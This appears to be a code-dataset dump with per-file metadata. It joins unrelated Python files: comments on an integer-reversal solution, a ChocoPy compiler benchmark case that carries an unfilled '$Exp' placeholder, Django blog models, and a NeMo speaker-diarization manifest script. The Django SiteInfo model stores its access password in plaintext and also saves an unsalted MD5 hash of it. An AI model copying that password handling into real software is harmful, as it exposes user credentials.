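# Illustrative check of the digit-reversal loop above (y = y*10 + x%10 peels digits off x from the right);
# hypothetical usage, not part of the original submission:
# print(Solution().reverse(-123))        # -> -321  (123 -> 3, 32, 321; sign restored at the end)
# print(Solution().reverse(1534236469))  # -> 0     (9646324351 exceeds the 32-bit range, so 0 is returned)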
|
[
"31997276+rpm1995@users.noreply.github.com"
] |
31997276+rpm1995@users.noreply.github.com
|
ce6e545dd6aeacb825dbc02fce6b0fdcd0e09478
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/pa3/sample/stmt_for_list_nonlocal-83.py
|
700f6f1b7fdff2447bb0082637f068e893d2663f
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
x:int = 0
def crunch(zz:[[int]]) -> object:
z:[int] = None
global x
def make_z() -> object:
nonlocal z
for z in zz:
pass # Set z to last element in zz
make_z()
for x in z:
pass # Set x to last element in z
crunch([[$Exp,2],[2,3],[4,5],[6,7]])
print(x)
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
1873a83d2c391a13a16edf28969ffb67056d7544
|
54c7e0d5c63246c46652292f3817fa6d46512fa8
|
/apps/base/models.py
|
5efae51e43b1c0788011dfc7ca040c98509e0f35
|
[
"Apache-2.0"
] |
permissive
|
helianthus1997/BlogBackendProject
|
4360d3837fa27b78c1e57c84d94f1055333ae15c
|
d4c0ee0bf19e5578e07425465930e1004cbe16d7
|
refs/heads/master
| 2020-03-14T11:29:53.918567
| 2018-04-14T17:00:39
| 2018-04-14T17:00:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,048
|
py
|
import hashlib
from django.db import models
from material.models import MaterialSocial, MaterialMaster
class NavigationLink(models.Model):
"""
    Custom navigation links
"""
TARGET_TYPE = (
("_blank", "blank - 浏览器总在一个新打开、未命名的窗口中载入目标文档。"),
("_self", "self - 这个目标的值对所有没有指定目标的 <a> 标签是默认目标,它使得目标文档载入并显示在相同的框架或者窗口中作为源文档。这个目标是多余且不必要的,除非和文档标题 <base> 标签中的 target 属性一起使用。"),
("_parent", "parent - 这个目标使得文档载入父窗口或者包含来超链接引用的框架的框架集。如果这个引用是在窗口或者在顶级框架中,那么它与目标 _self 等效。"),
("_top", "top - 这个目标使得文档载入包含这个超链接的窗口,用 _top 目标将会清除所有被包含的框架并将文档载入整个浏览器窗口。")
)
name = models.CharField(max_length=30, verbose_name="名称", help_text="名称")
desc = models.CharField(max_length=100, verbose_name="简介", help_text="简介")
image = models.ImageField(upload_to="base/friendlink/image/%y/%m", null=True, blank=True, verbose_name="图片", help_text="图片")
url = models.CharField(max_length=200, verbose_name="链接", help_text="链接")
target = models.CharField(max_length=10, choices=TARGET_TYPE, null=True, blank=True, verbose_name="Target类别",
help_text="对应于a标签中的target属性")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "自定义导航"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class SiteInfo(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
name_en = models.CharField(default="", max_length=20, verbose_name="名称英文", help_text="名称英文")
desc = models.CharField(default="", max_length=20, verbose_name="简介", help_text="简介")
icon = models.ImageField(upload_to="base/site/image/%y/%m", null=True, blank=True, verbose_name="图标", help_text="图标")
api_base_url = models.URLField(max_length=30, null=False, blank=False, verbose_name='API接口BaseURL')
navigations = models.ManyToManyField(NavigationLink, through="SiteInfoNavigation", through_fields=(
'site', 'navigation'), verbose_name='自定义导航', help_text='自定义导航')
copyright = models.CharField(default="", max_length=100, verbose_name="版权", help_text="版权")
icp = models.CharField(default="", max_length=20, verbose_name="ICP", help_text="ICP")
is_live = models.BooleanField(default=False, verbose_name="是否激活", help_text="是否激活")
is_force_refresh = models.BooleanField(default=False, verbose_name="是否强制刷新", help_text="是否强制刷新")
access_password = models.CharField(max_length=20, null=True, blank=True, verbose_name="访问密码", help_text="浏览密码")
access_password_encrypt = models.CharField(max_length=100, null=True, blank=True, verbose_name="浏览密码加密",
help_text="访问密码加密")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
def __str__(self):
return self.name
def save(self, *args, **kwargs):
if self.access_password:
md5 = hashlib.md5()
md5.update(self.access_password.encode('utf8'))
self.access_password_encrypt = md5.hexdigest()
else:
self.access_password_encrypt = ''
super(SiteInfo, self).save(*args, **kwargs)
class Meta:
verbose_name = "网站信息"
verbose_name_plural = verbose_name + '列表'
class BloggerInfo(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
name_en = models.CharField(default="", max_length=20, verbose_name="名称英文", help_text="名称英文")
desc = models.CharField(default="", max_length=300, verbose_name="简介", help_text="简介")
avatar = models.ImageField(upload_to="base/avatar/image/%y/%m", null=True, blank=True, verbose_name="头像", help_text="100*100")
background = models.ImageField(upload_to="base/background/image/%y/%m", null=True, blank=True, verbose_name="背景图", help_text="333*125")
socials = models.ManyToManyField(MaterialSocial, through='BloggerSocial', through_fields=('blogger', 'social'))
masters = models.ManyToManyField(MaterialMaster, through='BloggerMaster', through_fields=('blogger', 'master'))
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "个人信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class BloggerSocial(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
blogger = models.ForeignKey(BloggerInfo, verbose_name="个人", help_text="个人")
social = models.ForeignKey(MaterialSocial, verbose_name="社交平台", help_text="社交平台")
index = models.IntegerField(default=0, verbose_name="顺序", help_text="顺序")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "社交信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class BloggerMaster(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
blogger = models.ForeignKey(BloggerInfo, verbose_name="个人", help_text="个人")
master = models.ForeignKey(MaterialMaster, verbose_name="技能", help_text="技能")
index = models.IntegerField(default=0, verbose_name="顺序", help_text="顺序")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "技能信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class SiteInfoNavigation(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
site = models.ForeignKey(SiteInfo, verbose_name="网站", help_text="网站")
navigation = models.ForeignKey(NavigationLink, verbose_name="导航", help_text="导航")
index = models.IntegerField(default=0, verbose_name="顺序", help_text="顺序")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "导航信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class FriendLink(models.Model):
"""
    Friend links
"""
name = models.CharField(max_length=30, verbose_name="名称", help_text="名称")
desc = models.CharField(max_length=100, verbose_name="简介", help_text="简介")
image = models.ImageField(upload_to="base/friendlink/image/%y/%m", null=True, blank=True, verbose_name="图片", help_text="图片")
url = models.URLField(max_length=200, verbose_name="链接", help_text="链接")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "友情链接"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
|
[
"i@coderap.com"
] |
i@coderap.com
|
2d24fc4a0d81288c02b7170e0b960d7804117ead
|
a807ce0fa3e3e9c3b558b2e977c05e60c3a667b1
|
/scripts/speaker_recognition/rttm_to_manifest.py
|
3d7b772b05b94d534edf34d0698165658d9e6063
|
[
"Apache-2.0"
] |
permissive
|
blisc/NeMo
|
630376e7555c0face994da2f6f9af5d8d31243c3
|
fadeb45c84d6b323d78e30475538455a88b7c151
|
refs/heads/rework_reqs
| 2023-08-17T00:03:39.248669
| 2021-08-12T15:15:06
| 2021-08-12T15:15:06
| 208,142,160
| 2
| 0
|
Apache-2.0
| 2022-02-03T16:30:33
| 2019-09-12T20:37:24
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,666
|
py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from nemo.collections.asr.parts.utils.speaker_utils import write_rttm2manifest
from nemo.utils import logging
"""
This file converts vad outputs to manifest file for speaker diarization purposes
present in vad output directory.
every vad line consists of start_time, end_time , speech/non-speech
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--paths2rttm_files", help="path to vad output rttm-like files. Could be a list or a text file", required=True
)
parser.add_argument(
"--paths2audio_files",
help="path to audio files that vad was computed. Could be a list or a text file",
required=True,
)
parser.add_argument("--manifest_file", help="output manifest file name", type=str, required=True)
args = parser.parse_args()
write_rttm2manifest(args.paths2audio_files, args.paths2rttm_files, args.manifest_file)
logging.info("wrote {} file from vad output files present in {}".format(args.manifest_file, args.paths2rttm_files))
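# A minimal usage sketch (added for illustration; the file names below are hypothetical placeholders),
# showing the same conversion driven directly from Python, mirroring the call above:
#
#   from nemo.collections.asr.parts.utils.speaker_utils import write_rttm2manifest
#   write_rttm2manifest("audio_files.txt", "vad_rttm_files.txt", "diarization_manifest.json")
#
# where the first two arguments are a list or a text file of paths, as accepted by the --paths2* arguments.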
|
[
"noreply@github.com"
] |
blisc.noreply@github.com
|